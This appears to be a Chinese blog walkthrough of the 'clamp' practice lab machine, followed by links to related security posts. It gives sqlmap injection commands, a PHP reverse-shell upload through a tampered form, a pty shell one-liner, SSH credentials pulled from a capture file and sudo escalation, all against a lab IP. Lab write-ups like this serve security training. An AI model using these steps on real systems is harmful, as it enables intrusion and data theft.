clamp靶机复现

靶机设置

设置靶机为NAT模式

靶机IP发现

nmap 192.168.112.0/24

靶机IP为192.168.112.143

目录扫描

dirsearch 192.168.112.143

访问浏览器

提示让我们扫描更多的目录

换个更大的字典,扫出来一个 /nt4stopc/ 目录

目录拼接

拼接 /nt4stopc/

发现页面中有很多判断题

对为1,错为0

按顺序判断下来为 0110111001

拼接访问页面

SQL注入

点击网页发现存在id参数

尝试测试sql注入

python sqlmap.py -u http://192.168.112.143/nt4stopc/0110111001/summertimesummertime/go.php?id=1 --batch

果然发现存在sql注入

python sqlmap.py -u http://192.168.112.143/nt4stopc/0110111001/summertimesummertime/go.php?id=1 --dbs --batch

查看当前数据库

查看tatil表

python sqlmap.py -u http://192.168.112.143/nt4stopc/0110111001/summertimesummertime/go.php?id=1 -D tatil --tables --batch

字段内容为 hihijrijrijr-balrgralrijr-htjrzhujrz-bfnf folder upload.php

进行解码 uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas

再次拼接

再次拼接

拼接upload.php

发现文件上传点,但是没有提交按钮,自己添加一个

添加成功

getshell

kali生成反弹shell

locate php-reverse-shell.php

cp /usr/share/webshells/php/php-reverse-shell.php .

开启监听

上传文件

http://192.168.112.143/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/osas/2ad6bded962b884337eaeb921d7c2764.php

md5加密后访问文件

提权

生成交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

在 /var/www/html 下看见important.pcapng文件,查看他

发现有一个email信息

url解码后得到

email=mkelepce&message=Hello there, The password for the SSH account you want is: mkelepce:mklpc-osas112. If you encounter a problem, just mail it. Good work

账号: mkelepce

密码:mklpc-osas112.

登陆成功

sudo -l查看免密操作

发现可以进行任何操作

直接sudo su

提权成功

相关推荐
安全方案3 小时前
如何识别钓鱼邮件和诈骗网站?(附网络安全意识培训PPT资料)
网络安全·安全培训
H轨迹H6 小时前
SolidState靶机通关教程及提权
网络安全·渗透测试·靶机·oscp
D1TAsec8 小时前
Powercat 无文件落地执行技巧,你确定不进来看看?
网络安全
文大。8 小时前
2024年广西职工职业技能大赛-Spring
java·spring·网络安全
风间琉璃""8 小时前
bugkctf 渗透测试1超详细版
数据库·web安全·网络安全·渗透测试·内网·安全工具
儒道易行9 小时前
【DSVW】攻防实战全记录
web安全·网络安全
索然无味io11 小时前
跨站请求伪造之基本介绍
前端·笔记·学习·web安全·网络安全·php
Mitch31114 小时前
【漏洞复现】CVE-2015-3337 Arbitrary File Reading
elasticsearch·网络安全·docker·漏洞复现
燕雀安知鸿鹄之志哉.14 小时前
攻防世界 web ics-06
网络·经验分享·安全·web安全·网络安全